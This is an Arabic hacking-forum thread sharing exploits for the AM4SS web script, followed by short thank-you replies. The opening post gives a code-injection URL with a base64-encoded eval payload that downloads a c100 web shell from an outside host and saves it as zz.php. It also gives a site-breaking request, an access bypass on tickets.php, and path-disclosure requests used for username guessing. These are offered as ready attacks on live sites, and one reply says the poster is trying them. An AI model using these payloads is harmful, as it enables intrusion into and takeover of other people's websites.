1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Abu Abdullah | المشاهدات : 7,310 | الردود : 11
الوسوم:
حالة الموضوع:
مغلق
  1. Abu Abdullah Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    28
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    طآإلبَ
    الإقامة:
    جُ ــــده
    بسم الله الرحمن الرحيم

    السلام عليكم

    فحصت سكربت
    AM4SS

    لقيت كم ثغرة ماهي خطيره وحبيت بالمره احط باقي ثغرات السكربت في الموضوع


    طبعا كان الثغرة الاولى من اكتشاف اورنج مان
    وهي بالشكل التالي



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]ddd[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#007700]/global.[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?[/COLOR][COLOR=#0000BB]bn[/COLOR][COLOR=#007700]=[/COLOR]
    *=== تحديد كود ===*

    الاستغلال هتضيف هالكود بعد =


    كود:
    eval(base64_decode(JGZpbGUgPSBmb3BlbigienoucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnNoM2xsLm9yZy9jMTAwLnR4dCIpOyR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLCRzYSk7)
    *=== تحديد كود ===*

    وبتلقى شل بهالاسم zz.php


    الثغرة الثانيه نفس النوع بس انها تعطب الموقع



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]gg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#FF8000]//admincp/global.php?Checker=youStop();[/COLOR]
    *=== تحديد كود ===*

    واظن ان هالثغرتين من نفس المبرمج اضافها



    وثغرة اكسس بهالمكان طبعا الاستفاده منها يتطلب صفحة html



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]
    *=== تحديد كود ===*

    [​IMG]


    االحين اخطاء تتسسب باظهار مسار الموقع بيفيدني في استخراج اليوزر
    والتخمين

    تدخل ع هالمسار
    login.php
    وبعدها تضغط دخول وتشغل الاداءة مثل الصوره

    [​IMG]



    كود:
    [COLOR=#0000BB]password[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]sample[/COLOR][COLOR=#007700]%[/COLOR][COLOR=#0000BB]40w3afl[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]tst[/COLOR]
    *=== تحديد كود ===*

    وبعد
    /



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]
    *=== تحديد كود ===*




    بنفس الطريقة الا قبلها


    كود:
    [COLOR=#0000BB]message[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]20[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]subject[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]sdfdsffggrgrt[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]3[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]userfullname[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]aamaqwdsa[/COLOR]
    *=== تحديد كود ===*


     
  2. ҢącҜęЯ .:: <font color="#669999"><b>أستاذ مشارك</b></font Developer

    الأنتساب:
    ‏26 ديسمبر 2011
    المشاركات:
    77
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الوظيفة:
    مكتشف ثغرات
    الإقامة:
    (KsA)
    نظام التشغيل:
    Linux
    رد: ثغرات سكربت am4ss

    بطل وربي


    واصل دون فواصل



     
  3. الحربي DeveloPer Plus

    الأنتساب:
    ‏9 ديسمبر 2011
    المشاركات:
    72
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    Ӄ Ŵ Ť
    رد: ثغرات سكربت am4ss

    مشكور اخي واصل الى الآمام​
     
  4. THE SN!PER <div class="smallfont"><span style="font-weight: b ExpErt DeveloPer

    الأنتساب:
    ‏2 أكتوبر 2011
    المشاركات:
    33
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    30
    الإقامة:
    أولها T وآخرها T
    نظام التشغيل:
    Linux
    رد: ثغرات سكربت am4ss

    بارك الله فيك عزيزي بس لومكمل جميلك واضع الأداة #:"
     
  5. Numb3rs Developer

    الأنتساب:
    ‏20 يوليو 2012
    المشاركات:
    10
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    15
    رد: ثغرات سكربت am4ss

    جــاري التجربـة .. تقبل تحياتي
     
  6. Dr.MOT إدارة الموقع

    الأنتساب:
    ‏2 سبتمبر 2011
    المشاركات:
    697
    الإعجابات المتلقاة:
    5,488
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:
    IraQ
    نظام التشغيل:
    windows 8.1
    اللغة البرمجية:
    CSS
    Facebook:
    YouTube:
    رد: ثغرات سكربت am4ss

    وعليكم السلام ورحمة الله وبركاته

    بالفعل موضوعك رائع ابو عبد الله وراح انزل الملف المصاب بالثغرة مع الترقيع

    موفق
     
  7. Abu Abdullah Developer

    الأنتساب:
    ‏28 يوليو 2012
    المشاركات:
    28
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    الوظيفة:
    طآإلبَ
    الإقامة:
    جُ ــــده
    رد: ثغرات سكربت am4ss

    مشكوووورين جميعا
    واتمنى الاستفادى للجميع
    )5:"​
     
  8. HASsouni Developer

    الأنتساب:
    ‏31 يوليو 2012
    المشاركات:
    20
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: ثغرات سكربت am4ss

    الله يعطيك العافيه

    على جهودك

    أأخي ​
     
  9. شنايدر العطوي Developer

    الأنتساب:
    ‏10 أكتوبر 2012
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: ثغرات سكربت am4ss

    يعطيك العافيه يالغآلي &:":
     
  10. System³² Developer

    الأنتساب:
    ‏29 أكتوبر 2012
    المشاركات:
    1
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    5
    رد: ثغرات سكربت am4ss

    روعهة
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة